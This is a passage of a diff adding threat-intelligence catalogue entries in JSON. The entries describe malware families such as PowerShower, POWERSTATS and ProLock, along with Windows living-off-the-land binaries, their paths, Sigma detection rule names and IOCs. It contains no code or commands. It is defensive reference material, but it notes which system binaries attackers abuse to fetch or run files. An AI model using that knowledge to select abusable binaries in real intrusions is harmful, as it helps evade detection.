Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5231", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6f48252d-3e86-415b-ab77-8c833d608b47", + "type": "similar" + } + ], + "uuid": "155053be-8a2c-4d5e-8206-36d992c5651d", + "value": "Powerpnt" + }, + { + "description": "[PowerPunch](https://app.tidalcyber.com/software/e7cdaf70-5e28-442a-b34d-894484788dc5) is a lightweight downloader that has been used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) since at least 2021.[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0685", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "41e8b4a4-2d31-46ee-bc56-12375084d067", + "type": "used-by" + }, + { + "dest-uuid": "d52291b4-bb23-45a8-aef0-3dc7e986ba15", + "type": "similar" + } + ], + "uuid": "e7cdaf70-5e28-442a-b34d-894484788dc5", + "value": "PowerPunch" + }, + { + "description": "[PowerShower](https://app.tidalcyber.com/software/2ca245de-77a9-4857-ba93-fd0d6988df9d) is a PowerShell backdoor used by [Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) for initial reconnaissance and to download and execute second stage payloads.[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)][[Kaspersky Cloud Atlas August 2019](https://app.tidalcyber.com/references/4c3ae600-0787-4847-b528-ae3e8ff1b5ef)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0441", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "type": "used-by" + }, + { + "dest-uuid": "53486bc7-7748-4716-8190-e4f1fde04c53", + "type": "similar" + } + ], + "uuid": "2ca245de-77a9-4857-ba93-fd0d6988df9d", + "value": "PowerShower" + }, + { + "description": "Based on similar descriptions of functionality, it appears S0145, as named by FireEye, is the same as the first stages of a backdoor named DNSMessenger by Cisco's Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. [[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)] [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]", + "meta": { + "id": "b92c79ab-39b6-46cd-9bd2-644df9632eed" + }, + "related": [ + { + "dest-uuid": "a4700431-6578-489f-9782-52e394277296", + "type": "similar" + } + ], + "uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", + "value": "DNSMessenger" + }, + { + "description": "[POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)] [[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0145", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "17e919aa-4a49-445c-b103-dbb8df9e7351", + "type": "similar" + }, + { + "dest-uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", + "type": "similar" + } + ], + "uuid": "a4700431-6578-489f-9782-52e394277296", + "value": "POWERSOURCE" + }, + { + "description": "[PowerSploit](https://app.tidalcyber.com/software/82fad10d-c921-4a87-a533-49def83d002b) is an open source, offensive security framework comprised of [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [[GitHub PowerSploit May 2012](https://app.tidalcyber.com/references/ec3edb54-9f1b-401d-a265-cd8924e5cb2b)] [[PowerShellMagazine PowerSploit July 2014](https://app.tidalcyber.com/references/7765d4f7-bf2d-43b9-a87e-74114a092645)] [[PowerSploit Documentation](https://app.tidalcyber.com/references/56628e55-94cd-4c5e-8f5a-34ffb7a45174)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0194", + "source": "MITRE", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "32385eba-7bbf-439e-acf2-83040e97165a", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "646e35d2-75de-4c1d-8ad3-616d3e155c5e", + "type": "used-by" + }, + { + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "type": "similar" + } + ], + "uuid": "82fad10d-c921-4a87-a533-49def83d002b", + "value": "PowerSploit" + }, + { + "description": "[PowerStallion](https://app.tidalcyber.com/software/837bcf97-37a7-4001-a466-306574fd7890) is a lightweight [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) backdoor used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2), possibly as a recovery access tool to install other backdoors.[[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0393", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "dcac85c1-6485-4790-84f6-de5e6f6b91dd", + "type": "similar" + } + ], + "uuid": "837bcf97-37a7-4001-a466-306574fd7890", + "value": "PowerStallion" + }, + { + "description": "[[Symantec MuddyWater Dec 2018](https://app.tidalcyber.com/references/a8e58ef1-91e1-4f93-b2ff-faa7a6365f5d)]", + "meta": { + "id": "a5fc5f97-9985-405d-81bb-fcc79f20f2f9" + }, + "related": [ + { + "dest-uuid": "39fc59c6-f1aa-4c93-8e43-1f41563e9d9e", + "type": "similar" + } + ], + "uuid": "4aaf5b58-a6ca-4ec9-84fc-697469698130", + "value": "Powermud" + }, + { + "description": "[POWERSTATS](https://app.tidalcyber.com/software/39fc59c6-f1aa-4c93-8e43-1f41563e9d9e) is a PowerShell-based first stage backdoor used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6). [[Unit 42 MuddyWater Nov 2017](https://app.tidalcyber.com/references/dcdee265-2e46-4f40-95c7-6a2683edb23a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0223", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", + "type": "similar" + }, + { + "dest-uuid": "4aaf5b58-a6ca-4ec9-84fc-697469698130", + "type": "similar" + } + ], + "uuid": "39fc59c6-f1aa-4c93-8e43-1f41563e9d9e", + "value": "POWERSTATS" + }, + { + "description": "[POWERTON](https://app.tidalcyber.com/software/b3c28750-3825-4e4d-ab92-f39a6b0827dd) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac). At least two variants of the backdoor have been identified, with the later version containing improved functionality.[[FireEye APT33 Guardrail](https://app.tidalcyber.com/references/4b4c9e72-eee1-4fa4-8dcb-501ec49882b0)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0371", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "type": "similar" + } + ], + "uuid": "b3c28750-3825-4e4d-ab92-f39a6b0827dd", + "value": "POWERTON" + }, + { + "description": "PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5039", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + } + ], + "uuid": "b8a101e4-e0d2-4002-94c6-18ea30da7aa7", + "value": "PowerTool" + }, + { + "description": "[PowGoop](https://app.tidalcyber.com/software/7ed984bb-d098-4d0a-90fd-b03e68842479) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) as their main loader.[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)][[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1046", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "c19d19ae-dd58-4584-8469-966bbeaa80e3", + "type": "similar" + } + ], + "uuid": "7ed984bb-d098-4d0a-90fd-b03e68842479", + "value": "PowGoop" + }, + { + "description": "[POWRUNER](https://app.tidalcyber.com/software/67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4) is a PowerShell script that sends and receives commands to and from the C2 server. [[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0184", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", + "type": "similar" + } + ], + "uuid": "67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4", + "value": "POWRUNER" + }, + { + "description": "[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]", + "meta": { + "id": "ed47f984-aa6e-408f-8779-772efa509344", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8127f51d-dce0-405a-a785-83883ba19c23", + "type": "similar" + } + ], + "uuid": "80b9a847-0d74-4c15-b86b-d34e43cfef21", + "value": "Presentationhost.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** File is used for executing Browser applications\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Presentationhost.exe\n* C:\\Windows\\SysWOW64\\Presentationhost.exe\n\n**Resources:**\n* [https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf](https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf)\n* [https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_presentationhost_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml)\n* Sigma: [proc_creation_win_lolbin_presentationhost.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml)\n* IOC: Execution of .xbap files may not be common on production workstations[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5141", + "source": "Tidal Cyber", + "tags": [ + "0661bf1f-76ec-490c-937a-efa3f02bc59b", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "80b9a847-0d74-4c15-b86b-d34e43cfef21", + "type": "similar" + } + ], + "uuid": "8127f51d-dce0-405a-a785-83883ba19c23", + "value": "Presentationhost" + }, + { + "description": "[Prestige](https://app.tidalcyber.com/software/4fb5b109-5a5c-5441-a0f9-f639ead5405e) ransomware has been used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1058", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "1da748a5-875d-4212-9222-b4c23ab861be", + "type": "similar" + } + ], + "uuid": "4fb5b109-5a5c-5441-a0f9-f639ead5405e", + "value": "Prestige" + }, + { + "description": "[Prikormka](https://app.tidalcyber.com/software/1da989a8-41cc-4e89-a435-a88acb72ae0d) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. [[ESET Operation Groundbait](https://app.tidalcyber.com/references/218e69fd-558c-459b-9a57-ad2ee3e96296)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0113", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37cc7eb6-12e3-467b-82e8-f20f2cc73c69", + "type": "similar" + } + ], + "uuid": "1da989a8-41cc-4e89-a435-a88acb72ae0d", + "value": "Prikormka" + }, + { + "description": "[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]", + "meta": { + "id": "5bc16a17-f5d8-41a8-95eb-855b19db8634", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "8ad4945d-6c54-4472-a476-906a9860fb82", + "type": "similar" + } + ], + "uuid": "5d8bd4c1-3ab5-4521-8ee8-5da3aad90b7d", + "value": "Print.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to send files to the printer\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\print.exe\n* C:\\Windows\\SysWOW64\\print.exe\n\n**Resources:**\n* [https://twitter.com/Oddvarmoe/status/985518877076541440](https://twitter.com/Oddvarmoe/status/985518877076541440)\n* [https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410](https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410)\n\n**Detection:**\n* Sigma: [proc_creation_win_print_remote_file_copy.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml)\n* IOC: Print.exe retrieving files from internet\n* IOC: Print.exe creating executable files on disk[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5142", + "source": "Tidal Cyber", + "tags": [ + "01aca077-8cfb-4d1d-9b83-3678cd26f050", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5d8bd4c1-3ab5-4521-8ee8-5da3aad90b7d", + "type": "similar" + } + ], + "uuid": "8ad4945d-6c54-4472-a476-906a9860fb82", + "value": "Print" + }, + { + "description": "[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]", + "meta": { + "id": "367a91cf-e761-4fc5-a0a9-177e8cf0f92f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "93ec2323-f93b-4d21-9930-f367948187f0", + "type": "similar" + } + ], + "uuid": "91a3db3c-53a5-4ee8-9586-af5d8f95ce4c", + "value": "PrintBrm.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Printer Migration Command-Line Tool\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe\n\n**Resources:**\n* [https://twitter.com/elliotkillick/status/1404117015447670800](https://twitter.com/elliotkillick/status/1404117015447670800)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_printbrm.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml)\n* IOC: PrintBrm.exe should not be run on a normal workstation[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5143", + "source": "Tidal Cyber", + "tags": [ + "37a70ca8-a027-458c-9a48-7e0d307462be", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "91a3db3c-53a5-4ee8-9586-af5d8f95ce4c", + "type": "similar" + } + ], + "uuid": "93ec2323-f93b-4d21-9930-f367948187f0", + "value": "PrintBrm" + }, + { + "description": "", + "meta": { + "id": "68b33e23-ad45-467e-991f-0a2e949ef390", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "0d6e00a3-6237-458a-85e5-1128bd7f4f50", + "type": "similar" + } + ], + "uuid": "f2c150e6-f4dc-4766-8579-16e739a6ca9b", + "value": "Microsoft Sysinternals ProcDump" + }, + { + "description": "ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5036", + "source": "Tidal Cyber", + "tags": [ + "c3eaf8a7-06e5-4e3a-9615-36316d9e10a8", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "f2c150e6-f4dc-4766-8579-16e739a6ca9b", + "type": "similar" + } + ], + "uuid": "0d6e00a3-6237-458a-85e5-1128bd7f4f50", + "value": "ProcDump" + }, + { + "description": "Process Hacker is a tool used to remove rootkits.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5040", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + } + ], + "uuid": "d390ea7d-0995-4069-924d-65d6c7c98e3c", + "value": "Process Hacker" + }, + { + "description": "[ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea). [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.[[Group IB Ransomware September 2020](https://app.tidalcyber.com/references/52d0e16f-9a20-442f-9a17-686e51d7e32b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0654", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "471d0e9f-2c8a-4e4b-8f3b-f85d2407806e", + "type": "similar" + } + ], + "uuid": "c8af096e-c71e-4751-b203-70c285b7a7bd", + "value": "ProLock" + }, + { + "description": "[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]", + "meta": { + "id": "13e2dec9-19c7-4364-98dc-af08542b3698", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "2ecf8041-8069-41a0-b6e8-5b328ae69e31", + "type": "similar" + } + ], + "uuid": "e8e39cc1-349c-43ca-b45d-9e8f5ead6be4", + "value": "ProtocolHandler.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary\n\n**Author:** Nir Chako\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_protocolhandler_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml)\n* IOC: Suspicious Office application Internet/network traffic[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5232", + "source": "Tidal Cyber", + "tags": [ + "77131d00-b8b2-42ef-afbd-1fbfc12729df", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e8e39cc1-349c-43ca-b45d-9e8f5ead6be4", + "type": "similar" + } + ], + "uuid": "2ecf8041-8069-41a0-b6e8-5b328ae69e31", + "value": "ProtocolHandler" + }, + { + "description": "[Proton](https://app.tidalcyber.com/software/d3bcdbc4-5998-4e50-bd45-cba6a3278427) is a macOS backdoor focusing on data theft and credential access [[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0279", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c541efb4-e7b1-4ad6-9da8-b4e113f5dd42", + "type": "similar" + } + ], + "uuid": "d3bcdbc4-5998-4e50-bd45-cba6a3278427", + "value": "Proton" + }, + { + "description": "[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]", + "meta": { + "id": "5cae27fd-b63d-4bc8-940c-857f3d5a730d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "83e1ac24-3928-40ba-b701-d72549a9430c", + "type": "similar" + } + ], + "uuid": "7eaa281e-d584-46da-bf0a-abc1fd34f925", + "value": "Provlaunch.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Launcher process\n\n**Author:** Grzegorz Tworek\n\n**Paths:**\n* c:\\windows\\system32\\provlaunch.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1674399582162153472](https://twitter.com/0gtweet/status/1674399582162153472)\n\n**Detection:**\n* Sigma: [proc_creation_win_provlaunch_potential_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml)\n* Sigma: 